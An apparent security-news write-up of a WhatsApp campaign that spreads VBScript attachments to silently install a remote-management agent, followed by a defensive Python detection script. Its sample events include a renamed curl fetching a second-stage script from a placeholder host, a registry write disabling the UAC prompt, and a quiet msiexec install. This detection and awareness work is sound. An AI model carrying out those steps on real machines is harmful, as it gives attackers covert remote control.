Overview of the WhatsApp-based VBScript infection chain | Image: Kaspersky Labs
At a glance
- Actor: Suspected Chinese-speaking threat actor (low confidence)
- Activity Type: Malware distribution and silent RMM installation
- Targets: Individual users globally (heavy focus on Malaysia)
- Scale: Broad opportunistic targeting; thousands of potential victims
- Jurisdiction: Active campaign; no law enforcement actions announced
- Source: Kaspersky Labs and Broadcom
TL;DR
A new WhatsApp malware campaign uses hijacked accounts to send malicious VBScript (.vbs) attachments. The multi-stage VBScript chain ends by silently installing a legitimate Remote Monitoring and Management (RMM) product, ManageEngine Endpoint Central, which gives the attackers persistent remote control of the victim's computer without dropping any conventional malware.
What happened
In June 2026, researchers uncovered an active malware operation spreading through WhatsApp direct messages. Attackers compromise WhatsApp accounts and message those accounts' contacts, so the lure arrives from a trusted sender. The attachments are disguised as financial documents under names such as "Account Statement.vbs" or "Billing Statement.vbs".
The attackers localize these filenames for each target region. For instance, they use "Aviso de dívida.vbs" for Portuguese-speaking targets and "Penyata bank.vbs" for victims in Malaysia. Opening the attachment starts a multi-stage VBScript infection chain, but how the script gets executed depends on the client. On WhatsApp Desktop, opening the attachment hands the .vbs file straight to the Windows Script Host. On WhatsApp Web, the browser saves the file, and the user typically launches it later from the browser's download history.
Stage 1: Initial Download
First, the script creates a hidden working directory with a randomized name such as "MSUpdate_12345", chosen to look like a system update folder. It then downloads two second-stage payloads from remote servers. To blend in, it renames standard Windows tools such as curl.exe so that they carry harmless-looking DLL file names; a process whose on-disk name ends in .dll but whose PE original filename is curl.exe is exactly the kind of mismatch defenders can alert on.
The scripts also use heavy obfuscation to hide their true purpose. According to a Kaspersky Labs report, “The threat actor uses deceptive file names masquerading as business and financial documents to persuade recipients to download and execute the attachment.” Furthermore, researchers at Broadcom confirmed that these fake invoices trigger a multi-stage execution process.
Stage 2: UAC Bypass and ZIP Extraction
Next, the VBScript infection chain splits into two parallel scripts. The first tries to neutralize Windows User Account Control (UAC): every 450 milliseconds it rewrites the ConsentPromptBehaviorAdmin value under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. Setting that value to 0 makes Windows elevate members of the Administrators group without a consent prompt, so later administrative actions run silently. Two caveats for defenders: writing that key itself requires administrative rights, so the loop can only succeed once the chain has already obtained elevation, and the change does nothing for a standard (non-admin) account, for which UAC still demands an administrator's credentials.
Meanwhile, the second script downloads a ZIP archive containing a ManageEngine Endpoint Central deployment package and extracts it silently through the Windows Shell COM interface. It also removes the download warning (the Mark-of-the-Web) from the extracted files, so the installer runs without the usual "this file came from the Internet" prompt.
Stage 3: RMM Installation
Finally, a separate setup script drives the deployment. It checks that the installer files are present, requests administrative privileges through a UAC prompt if it does not already have them, and once elevated installs the RMM agent silently with msiexec.exe.
The installation runs in the background with no visible window. ManageEngine Endpoint Central is a legitimate, signed enterprise endpoint-management product, so antivirus alone will not flag the install; the attackers simply abuse its remote-administration features to control the victim's machine. Detection therefore has to rest on how the software arrived (a chat attachment, a script host, a silent msiexec run) rather than on the binary itself.
Who is behind it
Security researchers suspect a Chinese-speaking threat actor operates this WhatsApp malware campaign. However, they assign low confidence to this attribution. Analysts discovered extensive Chinese-language comments inside the malicious scripts. These comments describe system integrity checks and deployment logic.
Furthermore, the command-and-control infrastructure overlaps with known threats. Specifically, one IP address (202.61.160.201) previously hosted ValleyRAT and Ghost RAT activity. This overlap suggests a potential connection. Still, authorities have not charged any individuals in connection with this operation.
Impact or scale
This WhatsApp malware campaign affects users on a global scale. The infection spans across Malaysia, Brazil, India, Mexico, Singapore, the UK, and several other nations. Notably, telemetry shows that 80% of the victims reside in Malaysia.
The attackers cast a wide net instead of targeting specific industries, going after individual consumers rather than large corporations. A successful infection grants the attackers full remote access to the machine, from which they can steal personal data or deploy additional payloads.
What comes next and protection
This operation remains active. Treat unexpected messages with extreme caution: never open script files such as .vbs, .bat, or .cmd received through chat applications, and verify any unexpected financial document with the sender by phone, because the WhatsApp account it came from may itself be hijacked.
Broadcom notes that its endpoint protection products, such as Carbon Black, block the suspicious script-host processes under standard policies. Network defenders should monitor for ManageEngine Endpoint Central installations that no administrator authorized, for processes whose PE original filename is curl.exe but whose on-disk name is not, and for writes that set ConsentPromptBehaviorAdmin to 0. Block the IP addresses published for this campaign, and keep the operating system and security software current. Where users have no legitimate need for VBScript, disabling Windows Script Host (HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings, Enabled = 0) or changing the default handler for .vbs files to Notepad turns a double-click into a harmless read instead of an execution.
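The monitoring advice above maps directly onto the three stages described earlier. The following is an added example written for this article, not code from Kaspersky or Broadcom: four detection rules for the chain (script host launched from WhatsApp or a browser download, a download tool running under a renamed .dll name, ConsentPromptBehaviorAdmin set to 0, and a quiet msiexec install spawned by a script host) run over constructed Sysmon-style events. Field names follow Sysmon Event ID 1 (process creation) and 13 (registry value set); every path, host, user name and the installer file name are placeholders, and the rename watchlist extends the article's curl.exe with two other download-capable binaries as an assumption.

```python
"""Detection rules for the WhatsApp VBScript -> RMM chain, run over constructed
Sysmon-style events. Added example for this article; not Kaspersky or Broadcom
code. Field names follow Sysmon Event ID 1 (process create) and 13 (registry
value set); every path, host and file name below is a placeholder."""
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Processes that hand a chat attachment to the script host: WhatsApp Desktop
# itself, or the browser/Explorer when the file came via WhatsApp Web.
LAUNCHERS = {"whatsapp.exe", "chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}
# Download-capable binaries worth watching for renaming. The article reports
# only curl.exe; certutil and bitsadmin are an assumed generalisation.
RENAME_WATCHLIST = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
UAC_VALUE = r"\policies\system\consentpromptbehavioradmin"


def _base(path):
    return ntpath.basename(path).lower()


def rule_script_from_chat(ev):
    """Stage 1: wscript/cscript running a .vbs that arrived through WhatsApp."""
    if ev.get("EventID") != 1 or _base(ev.get("Image", "")) not in SCRIPT_HOSTS:
        return False
    cmd = ev.get("CommandLine", "").lower()
    parent = _base(ev.get("ParentImage", ""))
    return ".vbs" in cmd and (parent in LAUNCHERS or "\\downloads\\" in cmd)


def rule_renamed_download_tool(ev):
    """Stage 1: PE original name is curl.exe (etc.) but the on-disk name differs."""
    if ev.get("EventID") != 1:
        return False
    orig = ev.get("OriginalFileName", "").lower()
    return orig in RENAME_WATCHLIST and _base(ev.get("Image", "")) != orig


def rule_uac_prompt_disabled(ev):
    """Stage 2: ConsentPromptBehaviorAdmin written as 0 (elevate without prompting)."""
    if ev.get("EventID") != 13:
        return False
    target = ev.get("TargetObject", "").lower()
    # Sysmon renders DWORD values as "DWORD (0x00000000)".
    return target.endswith(UAC_VALUE) and bool(re.search(r"DWORD \(0x0+\)", ev.get("Details", "")))


def rule_silent_msi_from_script_host(ev):
    """Stage 3: msiexec doing a quiet install, spawned by a script host."""
    if ev.get("EventID") != 1 or _base(ev.get("Image", "")) != "msiexec.exe":
        return False
    tokens = ev.get("CommandLine", "").lower().split()
    silent = any(t in tokens for t in ("/qn", "/quiet", "/q", "/passive"))
    return silent and _base(ev.get("ParentImage", "")) in SCRIPT_HOSTS


RULES = [  # in stage order
    ("script_launched_from_chat", rule_script_from_chat),
    ("renamed_download_tool", rule_renamed_download_tool),
    ("uac_admin_prompt_disabled", rule_uac_prompt_disabled),
    ("silent_msi_from_script_host", rule_silent_msi_from_script_host),
]


def detect(events):
    """Return (event_index, rule_name) for every event that trips a rule."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


def stages_seen(events):
    """Distinct stages observed on one host; three or more is the whole chain."""
    return {name for _, name in detect(events)}


# Constructed sample telemetry (not real events): one hit per stage plus a benign process.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\u\Downloads\Penyata bank.vbs"',
     "ParentImage": r"C:\Users\u\AppData\Local\WhatsApp\WhatsApp.exe", "OriginalFileName": "wscript.exe"},
    {"EventID": 1, "Image": r"C:\Users\u\AppData\Local\Temp\MSUpdate_12345\msvcp.dll",
     "CommandLine": r"msvcp.dll -s -o stage2.vbs http://example.invalid/s2",
     "ParentImage": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "curl.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 1, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\u\AppData\Local\Temp\MSUpdate_12345\agent.msi" /qn',
     "ParentImage": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "msiexec.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "OriginalFileName": "NOTEPAD.EXE"},
]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
    print("stages seen:", sorted(stages_seen(SAMPLE_EVENTS)))
```

Two design notes. OriginalFileName is read by Sysmon from the PE version resource, so the renamed-tool rule catches a plain rename but not an attacker who also patches that resource; pair it with a hash or signer check. A hit on the registry rule means the script is already running elevated, since writing that HKLM key requires administrative rights; to confirm that the product installed was specifically Endpoint Central, correlate with the MsiInstaller provider in the Windows Application log, whose installation events carry the product name.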